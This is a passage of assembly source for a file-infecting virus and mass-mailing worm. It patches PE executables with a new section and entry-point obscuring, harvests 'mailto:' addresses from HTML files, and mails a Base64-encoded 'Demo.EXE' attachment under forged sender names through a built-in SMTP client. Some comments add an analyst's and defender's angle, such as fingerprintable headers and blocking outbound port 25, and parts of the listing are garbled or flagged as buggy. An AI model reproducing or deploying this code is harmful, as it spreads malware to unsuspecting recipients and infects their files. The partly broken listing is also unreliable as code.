mov word ptr [esi+1ah],"KXV" ;写入感染标志

mov pNTHeader,esi ;esi -> IMAGE_NT_HEADER
mov ebx,edi

cmp eax,1
jnz Nt_krnl_set
jmp common_set
Nt_krnl_set:

Common_set:
mov pNewSection,ebx ; edi -> new Section
xor ebx,ebx
call SimpleEPO

push FILE_BEGIN
push 0
push [edi].PointerToRawData
push hfile
mov eax,dtss
call dword ptr [eax+_SetFilePointer]

;****************************************************************
;设置文件指针到结尾后,写入从VStart开始的代码,大小经过文件对齐
;****************************************************************
push 0
lea eax,[ebp+ByteWrite]
push eax
push [edi].SizeOfRawData
mov eax,dtss
push [eax+offset VStart]
push hfile
call dword ptr [eax+_WriteFile]

IF_F1:
push pMapping
mov eax,dtss
call dword ptr [eax+_UnmapViewOfFile]
IF_F2:
push hMapping
mov eax,dtss
call dword ptr [eax+_CloseHandle]
IF_F3:
push hfile
mov eax,dtss
call dword ptr [eax+_CloseHandle]
IF_Exit:
popad
add esp,1ch
ret 04h
;---------------------------------StartEPO------------------------------
;入口参数: pNewSection : 新添加节(病毒节)的指针
; pNTHeader : 文件IMAGE_NT_HEADER的指针
; pMapping : 文件指针
;拷贝JMP DWORD PTR [YYYYYYYY]中的YY…到Ret2ApiCall.
;--------------------------------------------------------------------------
SimpleEPO:
pushad
mov edx , [pNTHeader]
add edx , sizeof IMAGE_NT_HEADERS
assume edx : ptr IMAGE_SECTION_HEADER
mov ecx , [edx].SizeOfRawData
mov edi , [edx].PointerToRawData
add edi , [pMapping] ;Now edi = .text 的在文件中的偏移

@SearchE8:
mov al , 0e8h
repne scasb ;search for call xxxxxxxx
mov esi , edi ;edi - > xxxxxxxx 而不是 e8 xx xx xx xx.
lodsd ;search call relative
add esi , eax ;esi - > JMP DWORD PTR [YYYYYYYY]
lodsw
cmp ax , 025ffh ;esi - > YYYYYYYY
jnz @SearchE8
inc ebx ;纪录是第几个Jmp/call
cmp ebx,20h ;如果是第32个,那么开始工作....避免感染Ntoskrnl时,系统初始化失败...
jnz @SearchE8

PatchCALLandCopyJMP:
mov eax , [edx].VirtualAddress ;.text VirtualAddress
add eax , edi
sub eax , [pMapping]
sub eax , [edx].PointerToRawData ;eax contains VA of CALL XXXXXXXX
add eax , 4 ;sizeof(CALL xxxxxxxx) – sizeof(0E8h)
mov edx , pNewSection
mov edx , [edx].VirtualAddress
xchg eax , edx
sub eax , edx ;get new XXXXXXXX
stosd
push eax
mov eax,dtss
mov edi , [eax+offset Ret2ApiCall] ;write YYYYYYYY
pop eax
lodsd
stosd
popad
ret
Ring3InfectFile Endp

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 将文件名转换为大写格式 参数:文件名(use under win9x)
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
SwitchUpCase proc uses esi edi _lpszFile
push esi
mov ebx,esi
call [ebx+_lstrlen],_lpszFile
xchg eax,ecx
mov esi,_lpszFile
mov edi,esi
xor eax,eax
cld
Switch:
lodsb
cmp al,'a'
jb NoChange
cmp al,'z'
ja NoChange
sub al,20h
stosb
NoChange:
mov edi,esi
loop Switch
pop esi
ret
SwitchUpCase endp
;
; Gets e-mail from files if avaliable.
;
scanfile:
pushad
call get_my_delta
get_my_delta:
pop ebp
lea ebp,[ebp-offset get_my_delta]
mov byte ptr [ebp+mailFlag],0

push edx
; three steps into micro$hit
push 00000000h ; example of confusing API:
push 00000080h
push 00000003h
push 00000000h
push 00000001h
push 80000000h
push edi ; 1st step:
call dword ptr [ebp+_CreateFile] ; open file for the mapping
cmp eax,-1 ; read shared
pop edx
je scanFileError

mov dword ptr [ebp+fHnd],eax ; save file handle

push edx
push 0h
push eax
call dword ptr [ebp+_GetFileSize] ; needed to know the
cmp eax,-1 ; high limit
pop edx
je scanFileErrorClose

cmp eax,100h ; erm... file too much
jb scanFileErrorClose ; small

mov ebx,eax
sub ebx,[ebp+mailtoSize] ; sub mailto size
; for better search
push ebx edx
pop ebx edx

push edx ebx
push 00000000h
push 00000000h
push 00000000h
push 00000002h
push 00000000h
push dword ptr [ebp+fHnd] ; 2nd step:
call dword ptr [ebp+_CreateFileMapping] ; create a mapping file
pop ebx edx
cmp eax,0 ; for read-only
je scanFileErrorClose

mov dword ptr [ebp+mfHnd],eax ; save mapped file handle

push edx ebx
push 00000000h
push 00000000h
push 00000000h
push 00000004h
push eax ; 3rd step:
call dword ptr [ebp+_MapViewOfFile] ; create map view (for read)
cmp eax,0
pop ebx edx
je scanFileErrorCloseMap

mov edi,eax ; store adress into edi
add edx,edi
mov ecx,[ebp+mailtoSize]
lea esi,[ebp+mailto] ; get mailto string addr

cld
scanFileLoop: ; here comes the 'search
push ecx ; algo'
push esi
push edi

rep cmpsb
pop edi
pop esi
pop ecx

je scanFileFound
inc edi
cmp edi,edx
jae scanFileNotFound
jmp scanFileLoop

scanFileNotFound:
push eax
call dword ptr [ebp+_UnmapViewOfFile] ; delete map view

scanFileErrorCloseMap:
push dword ptr [ebp+mfHnd] ; close the mapped file
call dword ptr [ebp+_CloseHandle]

scanFileErrorClose:
push dword ptr [ebp+fHnd] ; close the file
call dword ptr [ebp+_CloseHandle]

scanFileError:
popad
stc
ret

scanFileFound:
mov esi,edi ; now comes 'get e-mail'
add esi,[ebp+mailtoSize] ; algo
mov edi,ebx
cld
nextChar:
cmp edx,esi
jbe scanFileNotFound

cmp byte ptr [esi],' '
je skipChar
cmp byte ptr [esi],'"'
je endChar
cmp byte ptr [esi],''''
je endChar
cmp byte ptr [esi],'@'
jne notFoundSep
mov byte ptr [ebp+mailFlag],1
notFoundSep:
movsb
jmp nextChar
skipChar:
inc esi
jmp nextChar
endChar:
mov byte ptr [edi],0

push eax
call dword ptr [ebp+_UnmapViewOfFile] ; delete map view

push dword ptr [ebp+mfHnd] ; close the mapped file
call dword ptr [ebp+_CloseHandle]

push dword ptr [ebp+fHnd] ; close the file
call dword ptr [ebp+_CloseHandle]
; sometimes is better to
; alloc mem and do it in
; a more classic way...
cmp byte ptr [ebp+mailFlag],1
jne wrongMailAddress
popad
clc
ret
wrongMailAddress:
popad
stc
ret
lpApiAddrs label near
dd offset sGetModuleHandle
dd offset sGetTickCount
dd offset sExitProcess
dd offset sSleep
dd offset sCreateFile
dd offset sWriteFile
ddoffset sReadFile
dd offset sCloseHandle
ddoffset sFindFirstFile
ddoffset sFindNextFirst
ddoffset sFindClose
ddoffset slstrcpy
dd offset slstrlen
ddoffset slstrcat
dd offset slstrstr
ddoffset slread
ddoffset sGetFileSize
ddoffset sUnmapViewOfFile
ddoffset sCreateFileMapping
ddoffset sMapViewOfFile
ddoffset sVirtualAlloc
ddoffset sExitThread
ddoffset sCreateThread
ddoffset sTerminateThread
ddoffset sGetDateformatA
ddoffset sSetFilePointer
dd 0

sGetModuleHandle db "GetModuleHandleA",0
sGetTickCount db "GetTickCount",0
sExitProcess db "ExitProcess",0
sSleep db "Sleep",0
sCreateFile db "CreateFileA",0
sWriteFile db "WriteFileA",0
sReadFiledb "ReadFileA",0
sCloseHandledb "CloseHandle",0
sFindFirstFiledb "FindFirstFileA",0
sFindNextFiledb "FindNextFileA",0
sFindClosedb "FindClose",0
slstrcpydb "lstrcpy",0
slstrlendb "lstrlen",0
slstrcatdb "lstrcat",0
slstrstrdb "lstrstr",0
slreaddb "lread",0
sGetFileSizedb "GetFileSize",0
sUnmapViewOfFiledb "UnmapViewOfFile",0
sCreateFileMapping db "CreateFileMappingA",0
sMapViewOfFiledb "MapViewOfFile",0
sVirtualAllocdb "VirtualAlloc",0
sExitThreaddb "ExitThread",0
sCreateThreaddb "CreateThread",0
sTerminateThreaddb "TerminateThread",0
sGetDateformatAdb "GetDateformatA",0
sSetFilePointerdb "SetFilePointer",0
_GetModuleHandle dd 0
_GetTickCount dd 0
_ExitProcess dd 0
_Sleep dd 0
_CreateFiledd 0
_WriteFiledd 0
_ReadFiledd 0
_CloseHandledd 0
_FindFirstFiledd 0
_FindNextFiledd 0
_FindClosedd 0
_lstrcpydd 0
_lstrlendd 0
_lstrcatdd 0
_lstrstrdd 0
_lreaddd 0
_GetFileSize dd 0
_UnmapViewOfFiledd 0
_CreateFileMappingdd 0
_MapViewOfFiledd 0
_VirtualAllocdd 0
_ExitThreaddd 0
_CreateThreaddd 0
_TerminateThreaddd 0
_GetDateformatAdd 0
_SetFilePointerdd 0
;Socket_apiz
ipApiaddrsa label near
dd offset sWSAStartUp
dd offset sWSACleanUp
dd offset sSend
dd offset shtons
dd offset sGetHostByName
dd offset sConnect
dd offset sSocket
dd offset sCloseSocket
dd offset sRecv
dd offset sSendto
dd offset shtons
dd offset sinet_addr
dd offset sWSAGetLastError
dd offset sinet_ntoa
dd offset sgethostname
dd offset sbind
dd offset slisten
dd offset saccept
ddoffset sRecvFrom
ddoffset sgethostname
dd 0

sWSAStartUp db"WSAStartUp", 0
sWSACleanUp db"WSACleanUp", 0
sSend db"Send", 0
shtons db"htons", 0
sGetHostByName db"GetHostByName", 0
sConnect db"Connect", 0
sSocket db"Socket", 0
sCloseSocket db"CloseSocket", 0
sRecv db"Recv", 0
sSendto db"Sendto", 0
shtons db"htons", 0
sinet_addr db"inet_addr", 0
sWSAGetLastError db"WSAGetLastError", 0
sinet_ntoa db"inet_ntoa", 0
sgethostname db"gethostname", 0
sbind db"bind", 0
slisten db"listen", 0
saccept db"accept", 0
sRecvFrom db "RecvFrom",0
sgethostname sb "gethostname",0
_WSAStartUp dd 0
_WSACleanUp dd 0
_Send dd 0
_htons dd 0
_GetHostByName dd 0
_Connect dd 0
_Socket dd 0
_CloseSocket dd 0
_Recv dd 0
_Sendto dd 0
_htons dd 0
_inet_addr dd 0
_WSAGetLastError dd 0
_inet_ntoa dd 0
_gethostname dd 0
_bind dd 0
_listen dd 0
_accept dd 0
_RecvFrom dd 0
_gethostname dd 0

Ring3Callz:
_MessageBoxA dd 0
_GetProcAddressA dd 0
_LoadLibraryA dd 0
MySearchApiz:
push esi
lea eax,[esi+Kernel32]
mov ebp,[eax]
mov eax,[ebp+3ch]
mov edx,[ebp+eax+78h]
add edx,ebp
mov ecx,[edx+18h]
mov ebx,[edx+20h]
add ebx,ebp
RSearch:
dec ecx
mov esi,[ebx+ecx*4]
add esi,ebp
mov eax,50746547h
cmp [esi],eax
jne RSearch
mov eax,41636f72h
cmp [esi+4],eax
jne RSearch
mov ebx,[edx+24h]
add ebx,ebp
mov cx,[ebx+ecx*2]
mov ebx,[edx+1ch]
add ebx,ebp
mov eax,[ebx+ecx*4]
add eax,ebp
pop esi
ret
Ring3Data:
Kernel32 dd 0
user32 dd 0
sock dd 0
r3dta dd 0
n_user32 db "user32.dll",0
n_sock db "ws2_32.dll",0
Ring3CodeLen = $ - offset Ring3Code
VerSion_table:
db "CopyRight(R) VXK/[CVC].GB"
db "Kernel Model Virus::AIDS Test"
db "User Model Virus And Worm:AIDS Test"
db "What IT Will Do>?",0
Ver_len = $ - offset VerSion_table
vadata :
; client stuff --------------------------------------------------------------
wsadata WSADATA <0> ; for wsocks install check
sockaddr SOCKADDR <0> ; for connection
sizeOfSockaddr equ SIZE SOCKADDR
fd dd 0 ; handle for the socket
response dd 0 ; for server response
responseb db 0 ; for server response

myHostSize equ 160 ; for HELO
heloCmd db 'helo '
myHost db "smtp.whois.ru",0
heloSize dd 0

server db 160 dup(0) ; name of the server
; the client session
cmd0 db 'mail from:' ; MAIL
cmdFrom db 160 dup(0)
sizeCmd0 equ offset $-offset cmd0
cmd1 db 'rcpt to:' ; RCPT
cmdTo db 160 dup(0)
sizeCmd1 equ offset $-offset cmd1
cmd2 db 'data',0dh,0ah ; DATA
sizeCmd2 equ offset $-offset cmd2
cmd4 db 'quit',0dh,0ah ; QUIT
sizeCmd4 equ offset $-offset cmd4

cmd dd cmd0,sizeCmd0,cmd1,sizeCmd1,cmd2,sizeCmd2
dd 0,0,cmd4,sizeCmd4 ; hehe. void **
nCmd dd 5
; ---------------------------------------------------------------------------

; find html files stuff -----------------------------------------------------
tempPath db 260 dup(0) ; to store paths
tempPaths equ 260 ; max size
find_data WIN32_FIND_DATA ; for finf and findn
searchPath db 260 dup(0) ; to store TEMP path
fmask db '*.ht*',0 ; mask to find html files

ffHnd dd 0 ; for findf and findn
; --------------------------------------------------------------------------

; search mail stuff --------------------------------------------------------
mailto db 'mailto:' ; string to found
mailtoSize equ offset $-offset mailto
mailFlag db 0 ; the mail is correct?
mail0 db 128 dup (0) ; to store e-mail
mail1 db 128 dup (0) ; to store e-mail
mail2 db 128 dup (0) ; to store e-mail
mail3 db 128 dup (0) ; to store e-mail
mail4 db 128 dup (0) ; to store e-mail
mail5 db 128 dup (0) ; to store e-mail
mail6 db 128 dup (0) ; to store e-mail
mail7 db 128 dup (0) ; to store e-mail
mail8 db 128 dup (0) ; to store e-mail
mail9 db 128 dup (0) ; to store e-mail
mailxRef dd offset mail0,offset mail1,offset mail2
dd offset mail3,offset mail4,offset mail5
dd offset mail6,offset mail7,offset mail8
dd offset mail9
endMailxRef equ 9*4
mailCount dd 0
; --------------------------------------------------------------------------

; shared data --------------------------------------------------------------
fHnd dd 0 ; file handle
mfHnd dd 0 ; mapped file handle
flag db 0 ; guess...
commandLine dd 0 ; mmm
smHnd dd 0 ; memory handle
mapOVHnd dd 0 ; i can't remeber ;)
fileSize dd 0 ; hohoho
; --------------------------------------------------------------------------

; registry stuff -----------------------------------------------------------
HKEY_LOCAL_MACHINE equ 80000001h
regPath db 'Software/Microsoft/Windows/CurrentVersion'
db '/Explorer/Shell Folders',0
requestedvalue db 'Personal',0
PersonalP db 128 dup(0)
PersonalPs dd 128
keyHnd dd 0
; --------------------------------------------------------------------------

; This data is required to encode into Base64 -------------------------------
encTable db 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuv'
db 'wxyz0123456789+/'
; The required data to encode into Base64 ends here -------------------------

; data to genmail -----------------------------------------------------------
; Strings that start with a length byte (sdate, sfrom, ssubject, the name
; tables, smailN) are copied by genMessage with 'mov cl,[x] / rep movsb';
; the zero-terminated ones (dateBuff, messbody, messEnd) are copied byte by byte.
dateBuffs equ 32 ; the date for the mail (buffer size)
dateBuff db dateBuffs dup(0) ; receives the GetDateFormatA output
dateformat db 'MM/dd/yy',0 ; format string passed to GetDateFormatA

sdate db 6,'Date: '
sfrom db 5,'From:' ; the chosen first name supplies the following space
ssubject db 16,'Subject: Demo',0dh,0ah ; NOTE(review): the text is 15 bytes; with a length byte of 16 genMessage copies one byte of messbody as well — confirm
messbody db 'MIME-Version: 1.0',0dh,0ah ; everything from here to messEnd is constant text
db 'Message-ID: ',0dh,0ah ; empty Message-ID header — an anomaly a mail gateway can key on
db 'Content-Type: multipart/mixed; boundary="a1234"',0dh,0ah ; hard-coded MIME boundary (static indicator)
db 0dh,0ah,'--a1234',0dh,0ah
db 'Content-Type: text/plain; charset=us-ascii',0dh,0ah
db 'Content-Transfer-Encoding: 7bit',0dh,0ah,0dh,0ah
db ' This is the demo you may like.',0dh,0ah ; lure text (static indicator)
db 0dh,0ah
db 0dh,0ah,'--a1234',0dh,0ah
db 'Content-Type: application/octet-stream; name="Demo.EXE"' ; executable attachment; its Base64 body is appended by genMessage
db 0dh,0ah,'Content-Transfer-Encoding: base64',0dh,0ah
db 'Content-Disposition: attachment; filename="Demo.EXE"' ; fixed attachment name (static indicator)
db 0dh,0ah,0dh,0ah,0
messEnd db 0dh,0ah,'--a1234--',0dh,0ah,0dh,0ah,0 ; closing boundary

; some names — first names for the forged From: display name (index 0..9, chosen from GetTickCount in genMessage)
name0 db 5,' Jhon'
name1 db 5,' Mark'
name2 db 5,' Bill'
name3 db 6,' Frank'
name4 db 4,' Sam'
name5 db 4,' Eva'
name6 db 6,' Carla'
name7 db 5,' Joan'
name8 db 5,' Jean'
name9 db 7,' Sophie'
nameRef dd offset name0,offset name1,offset name2,offset name3 ; pointer table, indexed as [nameRef + 4*n]
dd offset name4,offset name5,offset name6,offset name7
dd offset name8,offset name9

; some middle names (index 0..4)
mname0 db 1,' '
mname1 db 4,' M. '
mname2 db 4,' C. '
mname3 db 4,' T. '
mname4 db 4,' R. '
mnameRef dd offset mname0,offset mname1,offset mname2,offset mname3 ; pointer table (index 0..4)
dd offset mname4

; some 'apellidos' ;) — surnames, each ending with the ' <' that opens the address (index 0..9)
sname0 db 7,'Smith <'
sname1 db 9,'Woodruf <'
sname2 db 7,'Brown <'
sname3 db 7,'Steel <'
sname4 db 8,'Driver <'
sname5 db 8,'Seldon <'
sname6 db 7,'Forge <'
sname7 db 6,'Stab <'
sname8 db 10,'McAndrew <'
sname9 db 8,'Gregor <'
snameRef dd offset sname0,offset sname1,offset sname2,offset sname3 ; pointer table (index 0..9)
dd offset sname4,offset sname5,offset sname6,offset sname7
dd offset sname8,offset sname9

; some 'from' servers — forged sender mailboxes. Each entry is 'address>' CR LF with
; its length byte computed from label distances; genMessage uses the same text for
; the From: header and (prefixed with '<') for the MAIL FROM argument. The address
; text appears to have been replaced in this copy of the listing.
smail0s equ offset smail1-offset smail0-1 ; text length of smail0, excluding the length byte
smail0 db smail0s,'[email protected]>',0dh,0ah

smail1s equ offset smail2-offset smail1-1
smail1 db smail1s,'[email protected]>',0dh,0ah

smail2s equ offset smail3-offset smail2-1
smail2 db smail2s,'[email protected]>',0dh,0ah

smail3s equ offset smail4-offset smail3-1
smail3 db smail3s,'[email protected]>',0dh,0ah

smail4s equ offset smailRef-offset smail4-1 ; last entry: measured against the table that follows
smail4 db smail4s,'[email protected]>',0dh,0ah

smailRef dd offset smail0,offset smail1,offset smail2,offset smail3 ; pointer table (index 0..4)
dd offset smail4

commandLineOk db 260 dup(0) ; fixed command line (260 = MAX_PATH)
; ---------------------------------------------------------------------------

; Thread Stuff --------------------------------------------------------------
threadId0 dd 0 ; thread handle/id (written where the thread is created — not in this part of the listing)
thrSem db 0 ; "thread is working" counter; exitThr decrements it when the SMTP thread finishes
; ---------------------------------------------------------------------------
;
; generates a message for the mail
;
; Builds the complete SMTP DATA payload for one message into a caller-supplied
; buffer: Date:/From:/Subject:/To: headers, the fixed MIME body (messbody), the
; Base64-encoded attachment taken from the mapped view at mapOVHnd, the closing
; boundary (messEnd) and the terminating "." line. As side effects it fills the
; cmdFrom / cmdTo command buffers and their length fields in the cmd table, and
; copies the recipient's domain (text after '@') into 'server' for 'thread'.
;
; IN
; ebp: delta base — every data reference is [ebp+label]
; edi: output buffer for the message
; esi: recipient address, zero-terminated, containing an '@'
;
; OUT
; eax: number of bytes written to the buffer
; Clobbers: ebx (inside encodeBase64), ecx, edx, esi, edi, flags
;
; Analyst notes: the display name in From: is assembled from the name/mname/
; sname tables with GetTickCount as the random source, so the sender identity
; is fabricated. Header order, the MIME boundary and the attachment name are
; constant (see messbody), which makes the generated mail easy to fingerprint
; at a gateway.
;
genMessage:
push edi ; saved: start of the output buffer (popped into ecx at the end)
push esi ; saved: recipient address (popped back at 'pop esi' below)

push [ebp+dateBuffs] ; NOTE(review): dateBuffs is an equ (32), so this pushes the dword at [ebp+32] rather than the buffer size — confirm
push offset [ebp+dateBuff]
push offset [ebp+dateformat]
push 0 ; lpDate = NULL: current local date
push 0 ; dwFlags
push 0 ; Locale
call dword ptr [ebp+_GetDateformatA] ; dateBuff = today as 'MM/dd/yy'

cld
xor ecx,ecx
mov cl,byte ptr [ebp+sdate] ; length-prefixed string: first byte is the length
lea esi,[ebp+sdate]+1
rep movsb ; "Date: "

lea esi,[ebp+dateBuff]
date0: ; append the formatted date up to its terminator
cmp byte ptr [esi],0
je date1
movsb
jmp date0

date1:
mov word ptr [edi],0a0dh ; CR LF
add edi,2

xor ecx,ecx
mov cl,byte ptr [ebp+sfrom]
lea esi,[ebp+sfrom]+1
rep movsb ; "From:"

other0: ; first name: low 4 bits of the tick count, retried until 0..9
call dword ptr [ebp+_GetTickCount]
and al,00001111b
cmp al,9
ja other0

lea esi,[ebp+nameRef]
and eax,000000ffh
xor edx,edx
mov cl,4
mul cl ; ax = index * 4 (dword pointer table)
add esi,eax
mov esi,dword ptr [esi] ; esi -> chosen length-prefixed name

xor ecx,ecx
mov cl,byte ptr [esi]
inc esi
rep movsb

other1: ; middle initial: 0..4
call dword ptr [ebp+_GetTickCount]
and al,00001111b
cmp al,4
ja other1

lea esi,[ebp+mnameRef]
and eax,000000ffh
xor edx,edx
mov cl,4
mul cl
add esi,eax
mov esi,dword ptr [esi]

xor ecx,ecx
mov cl,byte ptr [esi]
inc esi
rep movsb

other2: ; surname (the entry ends with ' <'): 0..9
call dword ptr [ebp+_GetTickCount]
and al,00001111b
cmp al,9
ja other2

lea esi,[ebp+snameRef]
and eax,000000ffh
xor edx,edx
mov cl,4
mul cl
add esi,eax
mov esi,dword ptr [esi]

xor ecx,ecx
mov cl,byte ptr [esi]
inc esi
rep movsb

other3: ; sender mailbox: 0..4
call [ebp+_GetTickCount]
and al,00001111b
cmp al,4
ja other3

lea esi,[ebp+smailRef]
and eax,000000ffh
xor edx,edx
mov cl,4
mul cl
add esi,eax
mov esi,dword ptr [esi] ; esi -> chosen length-prefixed 'address>' CR LF

push esi edi ; store From
lea edi,[ebp+cmdFrom] ; MAIL FROM argument: '<' + the same address text
mov byte ptr [edi],'<'
inc edi
xor ecx,ecx
mov cl,byte ptr [esi]
inc esi
push ecx
rep movsb
pop ecx
add ecx,(ebp+offset cmdFrom-offset cmd0)+1 ; command length = text from cmd0 up to cmdFrom + address + 1; the (ebp+...) operand form is unusual for MASM — confirm how it assembles
mov dword ptr [ebp+cmd+4],ecx ; cmd table entry 0 is {pointer, length}: store the length
pop edi esi

xor ecx,ecx
mov cl,byte ptr [esi]
inc esi
rep movsb ; address text into the From: header line (ends with CR LF)

xor ecx,ecx
mov cl,byte ptr [ebp+ssubject]
lea esi,[ebp+ssubject]+1
rep movsb ; "Subject: Demo" CR LF (see the length-byte note at ssubject)

mov dword ptr [edi],' :oT' ; little-endian "To: "
add edi,4
pop esi ; esi = recipient address saved at entry

push esi edi ; store the server
lea edi,[ebp+server] ; server = text after '@', terminator included; 'thread' resolves it with gethostbyname
searchThe@:
inc esi
cmp byte ptr [esi],'@'
jne searchThe@
inc esi
storeServer:
cmp byte ptr [esi],0
je storeServerEnd
movsb
jmp storeServer
storeServerEnd:
movsb ; copy the terminating zero too
pop edi esi

push esi edi ; store To
lea edi,[ebp+cmdTo] ; RCPT TO argument: '<' + recipient + '>' CR LF
mov byte ptr [edi],'<'
inc edi
xor ecx,ecx
storeTo0:
cmp byte ptr [esi],0
je storeTo1
movsb
inc ecx ; ecx = recipient length
jmp storeTo0
storeTo1:
add ecx,(ebp+offset cmdTo-offset cmd1)+4 ; text from cmd1 up to cmdTo + recipient + '<' '>' CR LF (same operand form as above)
mov byte ptr [edi],'>'
mov word ptr [edi+1],0a0dh
mov dword ptr [ebp+cmd+12],ecx ; cmd table entry 1: store the length
pop edi esi

other4: ; recipient address into the To: header
cmp byte ptr [esi],0
je other5
movsb
jmp other4

other5:
mov word ptr [edi],0a0dh
add edi,2

lea esi,[ebp+messbody] ; fixed MIME headers, text part and attachment part headers
other6:
cmp byte ptr [esi],0
je other7
movsb
jmp other6

other7:
push esi
mov eax,dword ptr [ebp+fileSize] ; encodeBase64 needs a multiple of 3:
xor edx,edx ; ecx = (fileSize / 3 + 1) * 3, rounded up past fileSize
mov ecx,3 ; (so 1..3 bytes beyond fileSize are read from the mapping; no padding is produced)
div ecx
inc eax
xor edx,edx
mul ecx
mov ecx,eax
mov edx,edi ; destination = current output position
mov eax,dword ptr [ebp+mapOVHnd] ; source = mapped view of the attached file
call encodeBase64 ; returns edx = end of the encoded text
pop esi

mov edi,edx

mov word ptr [edi],0a0dh
add edi,2

lea esi,[ebp+messEnd] ; closing boundary
endm0:
cmp byte ptr [esi],0
je endm1
movsb
jmp endm0
endm1:

mov word ptr [edi],0a0dh ; SMTP end-of-data marker: CR LF "." CR LF
add edi,2
mov byte ptr [edi],'.'
inc edi
mov word ptr [edi],0a0dh
add edi,2

pop ecx ; ecx = start of the buffer (edi saved at entry)
sub edi,ecx
mov eax,edi ; eax = bytes written
ret

;
; This is the SMTP client. It's nice. I think you can understand it.
; Look at internet standards (RFC821/RFC822 if i'm right...)
;
; Thread entry point (created elsewhere; thrSem counts it as running).
; Flow: socket() -> gethostname() -> build "HELO ..." -> gethostbyname(server)
; -> connect() to PORT -> expect 220 -> send HELO, expect 250 -> for each of
; the nCmd entries of the cmd table ({pointer, length} pairs, 8 bytes each)
; send the command and accept a 250, 251 or 354 reply -> closesocket ->
; dec thrSem -> ExitThread. A socket error or any other reply code jumps
; straight to the close path. ebp must hold the delta base on entry; 'server',
; cmdFrom/cmdTo and the cmd lengths are prepared by genMessage.
;
; Defender notes: this is a direct-to-MX mailer — a non-mail process opening
; outbound TCP/25 and speaking SMTP itself. Egress filtering of port 25 from
; workstations (permitting only the organisation's relay) stops it at the
; network layer, and a HELO that carries an internal hostname is a useful
; gateway signal.
;
thread:
push PCL_NONE
push SOCK_STREAM
push AF_INET
call dword ptr [ebp+_socket] ; open a socket
cmp eax,SOCKET_ERR
je exitThrQsocksC ; takes the close path although no socket was created

mov dword ptr [ebp+fd],eax ; save the socket

push [ebp+myHostSize]
push offset [ebp+myHost]
call dword ptr [ebp+_gethostname] ; get host for helo
cmp eax,0
jne exitThrQsocksC

lea edi,[ebp+heloCmd] ; heloCmd is zero-terminated text; how myHost is laid out relative to it is not visible here
mHeloLoop:
cmp byte ptr [edi],0
je heloDone
inc edi
jmp mHeloLoop
heloDone:
mov word ptr [edi],0a0dh ; terminate the command line with CR LF
add edi,2
mov ecx,edi
sub ecx,offset [ebp+heloCmd]
mov dword ptr [ebp+heloSize],ecx ; heloSize = bytes to send
; now fill the sockaddr
; for connection
mov word ptr [ebp+sockaddr].sin_family,AF_INET

push offset [ebp+server] ; recipient's domain, copied out by genMessage
call dword ptr [ebp+_gethostbyname] ; get the hostent struct
cmp eax,0
je exitThrQsocksC

mov eax,dword ptr [eax+HOSTENT_IP] ; presumably h_addr_list
mov eax,dword ptr [eax] ; NOTE(review): depending on what HOSTENT_IP denotes, this may be the pointer to the first address rather than the address value — confirm
mov dword ptr [ebp+sockaddr].sin_addr,eax

push [ebp+PORT] ; NOTE(review): PORT is an equ (25), so this pushes the dword at [ebp+25], not the constant — confirm intended
call dword ptr [ebp+_htons] ; get port in network byte
mov word ptr [ebp+sockaddr].sin_port,ax ; order

push [ebp+sizeOfSockaddr]
push offset [ebp+sockaddr]
push dword ptr [ebp+fd]
call dword ptr [ebp+_Connect] ; connect now!
cmp ax,SOCKET_ERR ; 16-bit compare, unlike the eax compares elsewhere
je exitThrQsocksC

mov eax,dword ptr [ebp+fd]
call SResponse ; get server response
cmp eax,SOCKET_ERR ; to connection
je exitThrQsocksC
cmp eax,' 022' ; "220 " read as a little-endian dword: service ready
jne exitThrQsocksC

lea esi,[ebp+heloCmd]
mov ecx,dword ptr [ebp+heloSize] ; helloooo

mov eax,dword ptr [ebp+fd]
call writeSocket ; write command

mov eax,dword ptr [fd] ; NOTE(review): no ebp delta on this reference, unlike every other access to fd
call SResponse ; get server response
cmp eax,SOCKET_ERR ; to helo
je exitThrQsocksC
cmp eax,' 052' ; "250 " OK
jne exitThrQsocksC

lea edi,[ebp+cmd] ; edi -> cmd table: {pointer, length} per entry
mov ecx,[ebp+nCmd] ; ecx = number of entries

sendLoop:
push ecx

mov esi,dword ptr [edi] ; command text
mov ecx,dword ptr [edi+4] ; command length

mov eax,dword ptr [ebp+fd]
call writeSocket ; write command
pop ecx

push ecx
mov eax,dword ptr [ebp+fd]
call SResponse ; get server response
pop ecx
cmp eax,SOCKET_ERR
je exitThrQsocksC
cmp eax,' 052' ; "250 " OK
je replyOK
cmp eax,' 152' ; "251 " user not local, will forward
je replyOK
cmp eax,' 453' ; "354 " start mail input (reply to DATA)
jne exitThrQsocksC
replyOK:
add edi,8 ; next table entry
loop sendLoop

exitThrQsocksC:
push dword ptr [ebp+fd]
call [ebp+_closesocket]

exitThrQsocks:

exitThr:
dec byte ptr [ebp+thrSem] ; signal "thread finished" to whoever started it

push 0h ; exit Thr
call dword ptr [ebp+_ExitThread]

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;
; writeSocket — send one buffer on the socket (called from 'thread' above).
; NOTE(review): the 'writeSocket:' label itself is not present in this copy
; of the listing; it was presumably lost in extraction and belongs right
; before the first push below.
;
; IN
; esi: pointer to buffer
; ecx: bytes to write
; eax: socket
;
; OUT
; eax: status (the return value of _send)
;
; NOTE(review): if _send is Winsock send(socket, buf, len, flags), only three
; of its four arguments are pushed here; the flags slot and the stack balance
; after the stdcall return then depend on what the caller had on the stack.
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
push ecx ; len
push esi ; buf
push eax ; socket
call dword ptr [ebp+_send]

ret

;
; SResponse — read one SMTP reply line and return its leading code.
;
; IN
; eax: socket
;
; OUT
; eax: the first four bytes of the reply ("250 " etc.) as a little-endian
; dword — hence the ' 052'-style constants used by the callers;
; SOCKET_ERR if the first recv did not return exactly 4 bytes.
;
; Reads 4 bytes into 'response', then drains the rest of the line one byte
; at a time into 'responseb' until an LF (0Ah) arrives or recv stops
; returning data. Only the first line of a multi-line reply is consumed.
;
SResponse:
push eax ; keep the socket across the calls

push 0 ; flags
push 4 ; len
push offset [ebp+response] ; buf
push eax ; socket
call dword ptr [ebp+_recv]
cmp eax,4
jne errorSR

readSRLoop:
pop eax ; socket
push eax

push 0
push 1
push offset [ebp+responseb]
push eax
call dword ptr [ebp+_recv]
cmp eax,1
jne noMore ; 0 (connection closed) or SOCKET_ERR: stop draining
cmp byte ptr [ebp+responseb],0ah
jne readSRLoop

noMore:
pop eax
